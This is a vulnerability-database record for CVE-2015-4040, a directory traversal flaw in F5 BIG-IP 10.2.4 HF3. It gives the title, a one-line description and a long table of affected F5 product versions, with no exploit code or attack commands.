ID
VAR-E-201509-0153
CVE
| cve_id: | CVE-2015-4040 | Trust: 2.4 |
EDB ID
38448
TITLE
F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal. CVE-2015-4040CVE-127546 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | f5 | model: | big-ip build hotfix hf3 | scope: | eq | version: | 10.2.4595.0 | Trust: 1.6 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.5 | Trust: 0.6 |
| vendor: | f5 | model: | bigip build hf3 | scope: | eq | version: | 10.2.4595.0 | Trust: 0.5 |
| vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 3.1.1 | Trust: 0.3 |
| vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 3.1 | Trust: 0.3 |
| vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 3.0.6 | Trust: 0.3 |
| vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 3.0.5 | Trust: 0.3 |
| vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 3.0.4 | Trust: 0.3 |
| vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 3.0.3 | Trust: 0.3 |
| vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 3.0.2 | Trust: 0.3 |
| vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
| vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.2.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom hf3 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip wom hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.2.00 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator hf3 | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.2.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator hf5 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip webaccelerator hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.5 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.2.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm hf1 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm hf3 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm hf2 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm hf5 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm hf4 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip psm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip pem | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip pem | scope: | eq | version: | 11.5 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip pem | scope: | eq | version: | 11.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip pem | scope: | eq | version: | 11.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip pem | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip pem | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip pem hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm hf3 | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm hf1 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm hf2 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm hf5 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm hf4 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.2.00 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf4 | scope: | eq | version: | 11.6 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.6 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.5.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf8 | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf7 | scope: | eq | version: | 11.5 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.5 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf3 | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf1 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf2 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller 11.1.0-hf3 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller 11.1.0-hf2 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf5 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf4 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip link controller hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.5 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm hf1 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm hf3 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm hf2 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm hf5 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm hf4 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.5 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway hf3 | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway 11.1.0-hf3 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway 11.1.0-hf2 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway 11.0.0-hf2 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway 11.0.0-hf1 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway hf5 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway hf4 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway 10.2.3-hf1 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm hf2 | scope: | eq | version: | 11.2.00 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.2.00 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.0.00 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.40 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.5 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm hf1 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm hf3 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm hf2 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm hf5 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm hf4 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.5.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.4.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm hf1 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm hf3 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm hf2 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm hf5 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm hf4 | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics hf4 | scope: | eq | version: | 11.6 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.5.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics hf8 | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics hf7 | scope: | eq | version: | 11.5 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.5 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics hf3 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics hf3 | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.2 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics hf4 | scope: | eq | version: | 11.3.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics hf5 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics hf2 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics hf1 | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics hf5 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics hf2 | scope: | eq | version: | 11.2.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics hf7 | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics 11.0.0-hf2 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.0.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip afm | scope: | eq | version: | 11.5.1 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip afm | scope: | eq | version: | 11.5 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip afm | scope: | eq | version: | 11.4 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip afm | scope: | eq | version: | 11.3 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip afm | scope: | eq | version: | 11.6.0 | Trust: 0.3 |
| vendor: | f5 | model: | big-ip afm | scope: | eq | version: | 11.4.1 | Trust: 0.3 |
